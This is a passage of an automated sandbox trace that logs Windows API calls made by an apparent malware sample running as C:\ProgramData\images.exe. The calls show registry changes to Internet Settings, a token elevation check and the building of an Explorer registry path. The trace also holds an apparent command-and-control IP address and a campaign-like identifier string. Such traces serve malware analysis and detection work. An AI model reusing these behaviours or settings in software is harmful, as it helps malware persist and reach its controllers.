hModule=0x0, lpFilename=0x2c8f9d0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0298.042] GetProcessHeap () returned 0x650000 [0298.042] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x400000) returned 0x320a020 [0298.053] CreateFileA (lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0298.053] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36600 [0298.053] ReadFile (in: hFile=0x290, lpBuffer=0x320a020, nNumberOfBytesToRead=0x36600, lpNumberOfBytesRead=0x2c8f8c4, lpOverlapped=0x0 | out: lpBuffer=0x320a020*, lpNumberOfBytesRead=0x2c8f8c4*=0x36600, lpOverlapped=0x0) returned 1 [0298.058] CloseHandle (hObject=0x290) returned 1 [0298.058] GetProcessHeap () returned 0x650000 [0298.058] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x66e2d0 [0298.058] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="ñ\x0e\x965") returned 0x290 [0298.058] GetLastError () returned 0x0 [0298.058] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x2c8f8e0, lpdwDisposition=0x2c8f8f4 | out: phkResult=0x2c8f8e0*=0x294, lpdwDisposition=0x2c8f8f4*=0x2) returned 0x0 [0298.058] RegSetValueExA (in: hKey=0x294, lpValueName="MaxConnectionsPer1_0Server", Reserved=0x0, dwType=0x4, lpData=0x2c8f8ec*=0xa, cbData=0x4 | out: lpData=0x2c8f8ec*=0xa) returned 0x0 [0298.059] RegSetValueExA (in: hKey=0x294, lpValueName="MaxConnectionsPerServer", Reserved=0x0, dwType=0x4, lpData=0x2c8f8ec*=0xa, cbData=0x4 | out: lpData=0x2c8f8ec*=0xa) returned 0x0 [0298.059] RegCloseKey (hKey=0x294) returned 0x0 [0298.059] Sleep (dwMilliseconds=0x1f4) [0298.650] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x294 [0298.650] GetProcessHeap () returned 0x650000 [0298.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xf4) returned 0x67fcb8 [0298.651] GetProcessHeap () returned 0x650000 [0298.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400) returned 0x67fdb8 [0298.651] GetProcessHeap () returned 0x650000 [0298.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x13000) returned 0x6801c0 [0298.653] GetProcessHeap () returned 0x650000 [0298.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x13000) returned 0x6931c8 [0298.654] GetProcessHeap () returned 0x650000 [0298.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6801c0 | out: hHeap=0x650000) returned 1 [0298.657] GetProcessHeap () returned 0x650000 [0298.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a00) returned 0x6a61d0 [0298.657] GetProcessHeap () returned 0x650000 [0298.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a00) returned 0x6701e8 [0298.658] GetProcessHeap () returned 0x650000 [0298.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a61d0 | out: hHeap=0x650000) returned 1 [0298.661] GetProcessHeap () returned 0x650000 [0298.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x600) returned 0x674bf0 [0298.661] GetProcessHeap () returned 0x650000 [0298.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x600) returned 0x6751f8 [0298.661] GetProcessHeap () returned 0x650000 [0298.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674bf0 | out: hHeap=0x650000) returned 1 [0298.662] GetProcessHeap () returned 0x650000 [0298.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e00) returned 0x675800 [0298.662] GetProcessHeap () returned 0x650000 [0298.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e00) returned 0x6a61d0 [0298.662] GetProcessHeap () returned 0x650000 [0298.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x675800 | out: hHeap=0x650000) returned 1 [0298.663] GetProcessHeap () returned 0x650000 [0298.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1000) returned 0x6a8fd8 [0298.663] GetProcessHeap () returned 0x650000 [0298.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1000) returned 0x6a9fe0 [0298.663] GetProcessHeap () returned 0x650000 [0298.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a8fd8 | out: hHeap=0x650000) returned 1 [0298.664] GetProcessHeap () returned 0x650000 [0298.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x200) returned 0x674bf0 [0298.664] GetProcessHeap () returned 0x650000 [0298.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5a4) returned 0x6a8fd8 [0298.664] GetProcessHeap () returned 0x650000 [0298.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x13000) returned 0x6801c0 [0298.665] GetProcessHeap () returned 0x650000 [0298.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a00) returned 0x675800 [0298.665] GetProcessHeap () returned 0x650000 [0298.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x600) returned 0x6a9588 [0298.665] GetProcessHeap () returned 0x650000 [0298.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e00) returned 0x6aafe8 [0298.666] GetProcessHeap () returned 0x650000 [0298.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1000) returned 0x6addf0 [0298.666] GetProcessHeap () returned 0x650000 [0298.667] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a9fe0 | out: hHeap=0x650000) returned 1 [0298.667] GetProcessHeap () returned 0x650000 [0298.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a61d0 | out: hHeap=0x650000) returned 1 [0298.668] GetProcessHeap () returned 0x650000 [0298.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6751f8 | out: hHeap=0x650000) returned 1 [0298.668] GetProcessHeap () returned 0x650000 [0298.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6701e8 | out: hHeap=0x650000) returned 1 [0298.669] GetProcessHeap () returned 0x650000 [0298.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6931c8 | out: hHeap=0x650000) returned 1 [0298.670] GetProcessHeap () returned 0x650000 [0298.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x200) returned 0x67a208 [0298.670] GetProcessHeap () returned 0x650000 [0298.671] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674bf0 | out: hHeap=0x650000) returned 1 [0298.671] lstrlenA (lpString=".bss") returned 4 [0298.671] lstrlenA (lpString=".bss") returned 4 [0298.671] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0298.672] lstrcpyA (in: lpString1=0x3610000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0298.672] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0298.672] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0298.672] GetProcessHeap () returned 0x650000 [0298.672] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x13000) returned 0x6931c8 [0298.677] lstrlenA (lpString=".text") returned 5 [0298.677] lstrlenA (lpString=".text") returned 5 [0298.677] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.678] lstrcpyA (in: lpString1=0x3620000, lpString2=".text" | out: lpString1=".text") returned=".text" [0298.678] lstrcmpA (lpString1=".text", lpString2=".bss") returned 1 [0298.678] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.679] GetProcessHeap () returned 0x650000 [0298.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6931c8 | out: hHeap=0x650000) returned 1 [0298.681] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0298.681] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0298.681] GetProcessHeap () returned 0x650000 [0298.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a00) returned 0x6701e8 [0298.682] lstrlenA (lpString=".rdata") returned 6 [0298.682] lstrlenA (lpString=".rdata") returned 6 [0298.682] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.682] lstrcpyA (in: lpString1=0x3620000, lpString2=".rdata" | out: lpString1=".rdata") returned=".rdata" [0298.682] lstrcmpA (lpString1=".rdata", lpString2=".bss") returned 1 [0298.682] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.683] GetProcessHeap () returned 0x650000 [0298.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6701e8 | out: hHeap=0x650000) returned 1 [0298.684] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0298.684] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0298.684] GetProcessHeap () returned 0x650000 [0298.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x600) returned 0x6aedf8 [0298.684] lstrlenA (lpString=".data") returned 5 [0298.684] lstrlenA (lpString=".data") returned 5 [0298.684] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.684] lstrcpyA (in: lpString1=0x3620000, lpString2=".data" | out: lpString1=".data") returned=".data" [0298.685] lstrcmpA (lpString1=".data", lpString2=".bss") returned 1 [0298.685] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.685] GetProcessHeap () returned 0x650000 [0298.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6aedf8 | out: hHeap=0x650000) returned 1 [0298.685] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0298.686] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0298.686] GetProcessHeap () returned 0x650000 [0298.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e00) returned 0x6701e8 [0298.686] lstrlenA (lpString=".rsrc") returned 5 [0298.686] lstrlenA (lpString=".rsrc") returned 5 [0298.686] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.687] lstrcpyA (in: lpString1=0x3620000, lpString2=".rsrc" | out: lpString1=".rsrc") returned=".rsrc" [0298.687] lstrcmpA (lpString1=".rsrc", lpString2=".bss") returned 1 [0298.687] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.687] GetProcessHeap () returned 0x650000 [0298.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6701e8 | out: hHeap=0x650000) returned 1 [0298.688] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0298.688] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0298.688] GetProcessHeap () returned 0x650000 [0298.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1000) returned 0x6aedf8 [0298.688] lstrlenA (lpString=".reloc") returned 6 [0298.688] lstrlenA (lpString=".reloc") returned 6 [0298.688] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.736] lstrcpyA (in: lpString1=0x3620000, lpString2=".reloc" | out: lpString1=".reloc") returned=".reloc" [0298.736] lstrcmpA (lpString1=".reloc", lpString2=".bss") returned 1 [0298.736] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.739] GetProcessHeap () returned 0x650000 [0298.740] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6aedf8 | out: hHeap=0x650000) returned 1 [0298.740] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0298.740] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0298.740] GetProcessHeap () returned 0x650000 [0298.740] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x200) returned 0x6aedf8 [0298.740] lstrlenA (lpString=".bss") returned 4 [0298.740] lstrlenA (lpString=".bss") returned 4 [0298.740] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.741] lstrcpyA (in: lpString1=0x3620000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0298.741] lstrcmpA (lpString1=".bss", lpString2=".bss") returned 0 [0298.741] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.742] GetProcessHeap () returned 0x650000 [0298.742] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6aedf8 | out: hHeap=0x650000) returned 1 [0298.742] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0298.743] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0298.743] GetProcessHeap () returned 0x650000 [0298.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x200) returned 0x6aedf8 [0298.743] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.743] GetProcessHeap () returned 0x650000 [0298.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x200) returned 0x6af000 [0298.743] GetProcessHeap () returned 0x650000 [0298.743] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x200) returned 0x6af208 [0298.743] GetProcessHeap () returned 0x650000 [0298.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6af000 | out: hHeap=0x650000) returned 1 [0298.744] GetProcessHeap () returned 0x650000 [0298.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1ca) returned 0x67a410 [0298.744] GetProcessHeap () returned 0x650000 [0298.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1ca) returned 0x6af000 [0298.744] GetProcessHeap () returned 0x650000 [0298.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a410 | out: hHeap=0x650000) returned 1 [0298.744] GetProcessHeap () returned 0x650000 [0298.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1ca) returned 0x67a410 [0298.744] GetProcessHeap () returned 0x650000 [0298.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x32) returned 0x65ea10 [0298.744] GetProcessHeap () returned 0x650000 [0298.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x32) returned 0x65e710 [0298.744] GetProcessHeap () returned 0x650000 [0298.745] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x65ea10 | out: hHeap=0x650000) returned 1 [0298.745] GetProcessHeap () returned 0x650000 [0298.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x32) returned 0x65ea90 [0298.745] GetProcessHeap () returned 0x650000 [0298.745] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x65e710 | out: hHeap=0x650000) returned 1 [0298.745] GetProcessHeap () returned 0x650000 [0298.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x32) returned 0x65eb10 [0298.746] GetProcessHeap () returned 0x650000 [0298.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1ca) returned 0x6af410 [0298.746] GetProcessHeap () returned 0x650000 [0298.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1ca) returned 0x6af5e8 [0298.746] GetProcessHeap () returned 0x650000 [0298.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6af410 | out: hHeap=0x650000) returned 1 [0298.746] GetProcessHeap () returned 0x650000 [0298.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x65eb10 | out: hHeap=0x650000) returned 1 [0298.746] GetProcessHeap () returned 0x650000 [0298.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a410 | out: hHeap=0x650000) returned 1 [0298.747] GetProcessHeap () returned 0x650000 [0298.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6af000 | out: hHeap=0x650000) returned 1 [0298.747] GetProcessHeap () returned 0x650000 [0298.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1e) returned 0x66e0c8 [0298.747] lstrlenW (lpString="23.227.202.157") returned 14 [0298.747] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0298.748] lstrlenW (lpString="23.227.202.157") returned 14 [0298.748] lstrcpyW (in: lpString1=0x3610000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0298.748] lstrlenW (lpString="23.227.202.157") returned 14 [0298.748] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.748] lstrcpyW (in: lpString1=0x3620000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0298.748] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.749] GetProcessHeap () returned 0x650000 [0298.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66e0c8 | out: hHeap=0x650000) returned 1 [0298.749] lstrlenW (lpString="23.227.202.157") returned 14 [0298.749] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0298.749] lstrcpyW (in: lpString1=0x3610000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0298.749] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.750] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0298.750] GetProcessHeap () returned 0x650000 [0298.750] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x16) returned 0x66ccf0 [0298.750] lstrlenW (lpString="images.exe") returned 10 [0298.750] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.750] lstrlenW (lpString="images.exe") returned 10 [0298.750] lstrcpyW (in: lpString1=0x3620000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0298.750] lstrlenW (lpString="images.exe") returned 10 [0298.751] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0298.751] lstrcpyW (in: lpString1=0x3630000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0298.751] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.752] GetProcessHeap () returned 0x650000 [0298.752] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66ccf0 | out: hHeap=0x650000) returned 1 [0298.752] lstrlenW (lpString="images.exe") returned 10 [0298.752] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0298.752] lstrcpyW (in: lpString1=0x3620000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0298.752] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.755] GetProcessHeap () returned 0x650000 [0298.755] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xe) returned 0x66fea0 [0298.755] lstrlenW (lpString="Images") returned 6 [0298.755] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0298.755] lstrlenW (lpString="Images") returned 6 [0298.755] lstrcpyW (in: lpString1=0x3630000, lpString2="Images" | out: lpString1="Images") returned="Images" [0298.755] lstrlenW (lpString="Images") returned 6 [0298.755] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0298.756] lstrcpyW (in: lpString1=0x3640000, lpString2="Images" | out: lpString1="Images") returned="Images" [0298.756] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.757] GetProcessHeap () returned 0x650000 [0298.757] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66fea0 | out: hHeap=0x650000) returned 1 [0298.757] lstrlenW (lpString="Images") returned 6 [0298.757] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0298.757] lstrcpyW (in: lpString1=0x3630000, lpString2="Images" | out: lpString1="Images") returned="Images" [0298.757] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.758] GetProcessHeap () returned 0x650000 [0298.758] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x16) returned 0x66cc10 [0298.758] lstrlenW (lpString="L15UQINRPS") returned 10 [0298.758] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0298.758] lstrlenW (lpString="L15UQINRPS") returned 10 [0298.758] lstrcpyW (in: lpString1=0x3640000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0298.759] lstrlenW (lpString="L15UQINRPS") returned 10 [0298.759] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3650000 [0298.759] lstrcpyW (in: lpString1=0x3650000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0298.759] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.760] GetProcessHeap () returned 0x650000 [0298.760] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66cc10 | out: hHeap=0x650000) returned 1 [0298.760] lstrlenW (lpString="L15UQINRPS") returned 10 [0298.760] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0298.760] lstrcpyW (in: lpString1=0x3640000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0298.760] VirtualFree (lpAddress=0x3650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.761] GetProcessHeap () returned 0x650000 [0298.761] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6af5e8 | out: hHeap=0x650000) returned 1 [0298.761] GetProcessHeap () returned 0x650000 [0298.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6aedf8 | out: hHeap=0x650000) returned 1 [0298.762] GetProcessHeap () returned 0x650000 [0298.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a208 | out: hHeap=0x650000) returned 1 [0298.762] GetProcessHeap () returned 0x650000 [0298.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6addf0 | out: hHeap=0x650000) returned 1 [0298.762] GetProcessHeap () returned 0x650000 [0298.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6aafe8 | out: hHeap=0x650000) returned 1 [0298.763] GetProcessHeap () returned 0x650000 [0298.764] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a9588 | out: hHeap=0x650000) returned 1 [0298.764] GetProcessHeap () returned 0x650000 [0298.764] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x675800 | out: hHeap=0x650000) returned 1 [0298.765] GetProcessHeap () returned 0x650000 [0298.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6801c0 | out: hHeap=0x650000) returned 1 [0298.771] GetProcessHeap () returned 0x650000 [0298.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67fdb8 | out: hHeap=0x650000) returned 1 [0298.773] ReleaseMutex (hMutex=0x294) returned 0 [0298.773] CloseHandle (hObject=0x294) returned 1 [0298.773] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0298.773] GetProcessHeap () returned 0x650000 [0298.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x32) returned 0x65e710 [0298.773] lstrlenW (lpString="23.227.202.157") returned 14 [0298.773] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3650000 [0298.774] lstrcpyW (in: lpString1=0x3650000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0298.774] lstrlenW (lpString="images.exe") returned 10 [0298.774] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3660000 [0298.774] lstrcpyW (in: lpString1=0x3660000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0298.775] lstrlenW (lpString="Images") returned 6 [0298.775] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3670000 [0298.775] lstrcpyW (in: lpString1=0x3670000, lpString2="Images" | out: lpString1="Images") returned="Images" [0298.775] lstrlenW (lpString="L15UQINRPS") returned 10 [0298.775] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3680000 [0298.776] lstrcpyW (in: lpString1=0x3680000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0298.776] GetProcessHeap () returned 0x650000 [0298.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x200) returned 0x6af410 [0298.776] GetCurrentProcess () returned 0xffffffff [0298.776] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2c8f894 | out: TokenHandle=0x2c8f894*=0x294) returned 1 [0298.776] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x14, TokenInformation=0x2c8f88c, TokenInformationLength=0x4, ReturnLength=0x2c8f890 | out: TokenInformation=0x2c8f88c, ReturnLength=0x2c8f890) returned 1 [0298.776] CloseHandle (hObject=0x294) returned 1 [0298.776] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0298.776] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0298.777] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0298.777] lstrcpyW (in: lpString1=0x3690000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0298.777] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0298.777] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x36a0000 [0298.777] lstrcpyW (in: lpString1=0x36a0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0298.777] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.778] lstrlenW (lpString="L15UQINRPS") returned 10 [0298.778] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0298.779] lstrcpyW (in: lpString1=0x3690000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0298.779] lstrlenW (lpString="L15UQINRPS") returned 10 [0298.779] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0298.779] VirtualQuery (in: lpAddress=0x36a0000, lpBuffer=0x2c8f84c, dwLength=0x1c | out: lpBuffer=0x2c8f84c*(BaseAddress=0x36a0000, AllocationBase=0x36a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0298.779] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x36b0000 [0298.780] VirtualFree (lpAddress=0x36a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.781] lstrcatW (in: 